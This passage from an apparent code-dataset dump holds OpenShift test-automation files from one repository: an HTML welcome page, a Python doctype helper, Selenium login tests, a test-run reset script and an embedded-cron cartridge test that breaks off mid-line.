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\n/w+9BQu2G5s85QAAAABJRU5ErkJggg==\\\">\n <h1>\n Welcome to OpenShift\n </h1>\n <p>\n Place your application here\n </p>\n <p>\n In order to commit to your new project, go to your projects git repo (created with the rhc-create-app command). Make your changes, then run:\n </p>\n <pre>\n git commit -a -m 'Some commit message'\n git push\n </pre>\n <p>\n Then reload this page.\n </p>\n \n <h2>\n What's next?\n </h2>\n <ul>\n <li>\n Why not visit us at <a href=\\\"http://openshift.redhat.com\\\">http://openshift.redhat.com</a>, or\n </li>\n <li>\n You could get help in the <a href=\\\"http://www.redhat.com/openshift\\\">OpenShift forums</a>, or\n </li>\n <li>\n You're welcome to come chat with us in our IRC channel at #openshift on freenode.net\n </li>\n </ul>\n</body>\n</html>\n\"]]\n end\n run welcome\nend\n" }, { "alpha_fraction": 0.5889724493026733, "alphanum_fraction": 0.6152881979942322, "avg_line_length": 26.44827651977539, "blob_id": "e36523ea01bcfaa5d5a17be2b659777e47933946", "content_id": "5ccf58e351d77e4d9cb47c1f990f1f56bbf3472f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 798, "license_type": "no_license", "max_line_length": 110, "num_lines": 29, "path": "/automation/open/lib/supports/XML/doctype.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\n\n<http://www.w3.org/TR/2000/REC-xml-20001006#sec-prolog-dtd>\n\nXXX needs work\n\n\"\"\"\n\n#[28] doctypedecl ::= '<!DOCTYPE' S Name (S ExternalID)? S? ('[' (markupdecl | DeclSep)* ']' S?)? '>'\n#[28a] DeclSep ::= PEReference | S [WFC: PE Between Declarations]\n#[29] markupdecl ::= elementdecl | AttlistDecl | EntityDecl | NotationDecl | PI | Comment\n\n\nclass Doctype(object):\n\tdef __init__(self, name, public, system=\"\"):\n\t\tself.name = name\n\t\tself.publicid = public\n\t\tself.system = system\n\tdef __str__(self):\n\t\treturn '<!DOCTYPE %s PUBLIC \"%s\" SYSTEM \"%s\">' % (self.name, self.publicid, self.system)\n\ndef get_doctype(name, public, system=\"\"):\n\treturn Doctype(name, public, system)\n\n\n" }, { "alpha_fraction": 0.6449235677719116, "alphanum_fraction": 0.6509279608726501, "avg_line_length": 39.263736724853516, "blob_id": "89ca51194b328df12dbfffd972043e2a33d5394f", "content_id": "1dc90ee4136297c794679f8662885f4114cf5c88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3664, "license_type": "no_license", "max_line_length": 103, "num_lines": 91, "path": "/automation/open/testmodules/UI/web/tc_userlanding.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\nclass UserLanding(unittest.TestCase):\n\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n \n def test_aa_go_to_a_dashboard_nonauth(self):\n self.driver.get(config.dashboard_path)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n\n def test_ab_go_to_b_controlpanel_noauth(self):\n self.driver.get(config.control_panel)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n\n def test_ac_go_to_c_flex_console_noauth(self):\n if config.proxy:\n self.driver.get(config.flex_console)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n else:pass\n \n def test_d_login_from_registr_page(self):\n self.driver.get(config.registration_page)\n time.sleep(3)\n baseutils.go_to_signin(self)\n baseutils.login_by_window(self,config.granted_user[0],config.granted_user[1])\n time.sleep(3)\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n \n def test_e_login_from_flex_registr_page(self):\n self.driver.get(config.flex_registration_page)\n time.sleep(3)\n baseutils.go_to_signin(self)\n baseutils.login_by_window(self,config.granted_user[0],config.granted_user[1])\n time.sleep(3)\n baseutils.check_title(self,\"OpenShift by Red Hat | Flex\")\n \n def test_f_login_from_express_registr_page(self):\n self.driver.get(config.express_registration_page)\n time.sleep(3)\n baseutils.go_to_signin(self)\n baseutils.login_by_window(self,config.granted_user[0],config.granted_user[1])\n time.sleep(3)\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n '''\n def test_ae_login_from_dashboard(self):\n self.driver.get(config.dashboard_path)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n baseutils.scroll_bar(self)\n self.driver.refresh()\n baseutils.login_by_form(self,config.granted_user[0],config.granted_user[1])\n time.sleep(2)\n baseutils.assert_text_equal_by_css(self,\"Control Panel\",\"section.main > header > h1\")\n \n def test_af_login_from_control_panel(self):\n self.driver.get(config.control_panel)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n baseutils.scroll_bar(self)\n self.driver.refresh()\n baseutils.login_by_form(self,config.granted_user[0],config.granted_user[1])\n time.sleep(2)\n baseutils.assert_text_equal_by_css(self,\"Control Panel\",\"section.main > header > h1\")\n \n def test_c_login_from_flex_console(self):\n if config.proxy:\n self.driver.get(config.flex_console)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n baseutils.scroll_bar(self)\n self.driver.refresh()\n baseutils.login_by_form(self,config.granted_user[0],config.granted_user[1])\n self.assertTrue(config.flex_console in self.driver.current_url,\"flex console is not right\")\n else:pass\n ''' \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n \n\nif __name__ == \"__main__\":\n unittest.main()\n #HTMLTestRunner.main()\n" }, { "alpha_fraction": 0.6065573692321777, "alphanum_fraction": 0.6305170059204102, "avg_line_length": 21.628570556640625, "blob_id": "5bb431ce3c658086520b703ef2235c3593b9fba8", "content_id": "29ce2ef29162ecbc1406aeecf78ba8abefda17a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "no_license", "max_line_length": 85, "num_lines": 35, "path": "/automation/open/bin/reset_testrun.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n'''\n File name: reset_testrun.py\n Date: 2012/06/08 11:43\n Author: [email protected]\n'''\n\nimport sys\nimport os\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\ntestmodules_path = os.path.abspath(file_path + \"/../testmodules\")\nsys.path.append(lib_path)\nsys.path.append(lib_path + \"/supports\")\nsys.path.append(testmodules_path)\nfrom tcms import TCMS\n\n\ndef main():\n if (len(sys.argv)<2):\n print \"ERROR: Usage python %s <TESTRUN_ID> [state1, state2, ...]\"%sys.argv[0]\n sys.exit(2)\n\n sys.argv.pop(0)\n testrun_id=int(sys.argv.pop(0))\n state = sys.argv\n tcmsobj = TCMS()\n return tcmsobj.reset_testrun(testrun_id, state)\n\n\nif __name__ == \"__main__\":\n main()\n\n# end of reset_testrun.py \n" }, { "alpha_fraction": 0.5401397943496704, "alphanum_fraction": 0.5490362048149109, "avg_line_length": 36.16535568237305, "blob_id": "61c1824a98abfe160a859275cd39c7426163828d", "content_id": "b57ee8c4c9a1b47e3fe397eb3934b1426abed553", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4721, "license_type": "no_license", "max_line_length": 172, "num_lines": 127, "path": "/automation/open/testmodules/RT/cartridge/cron_embed.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: cron_embed.py\n# Date: 2012/02/13 10:32\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport time\nimport pexpect\n\nimport testcase, common, OSConf\nimport rhtest\n# user defined packages\nimport openshift\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary=\"[US648][Runtime][rhc-cartridge] Embedded Cron support\"\n self.app_name = common.getRandomString(10)\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `python` as default\")\n self.test_variant = 'python'\n self.app_type = common.app_types[self.test_variant]\n self.tcms_testcase_id = 130918\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass CronEmbed(OpenShiftTest):\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\"Create a sample application\" ,\n common.create_app,\n function_parameters = [self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Embed cron\",\n common.embed,\n function_parameters = [self.app_name, \n \"add-%s\"%(common.cartridge_types['cron']), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return = 0,\n expect_description = \"Embedding Cron should work.\"))\n\n self.steps_list.append(testcase.TestCaseStep(\"Create a new cron job\",\n '''\n cd %s &&\n mkdir -p .openshift/cron/minutely &&\n echo 'date +%%T@%%F >> $OPENSHIFT_DATA_DIR/date.txt' > .openshift/cron/minutely/date.sh &&\n git add .openshift/cron/minutely/date.sh &&\n git commit -m \"added new cron job\" -a &&\n git push\n '''%self.app_name,\n expect_description=\"Definying new cron task should work.\",\n expect_return = 0))\n\n def check_the_cron(self):\n self.info(\"Waiting for a minute to get some results from cron...\")\n uuid = OSConf.get_app_uuid(self.app_name)\n app_url = OSConf.get_app_url(self.app_name)\n time.sleep(65)\n p = pexpect.spawn('ssh -t -o 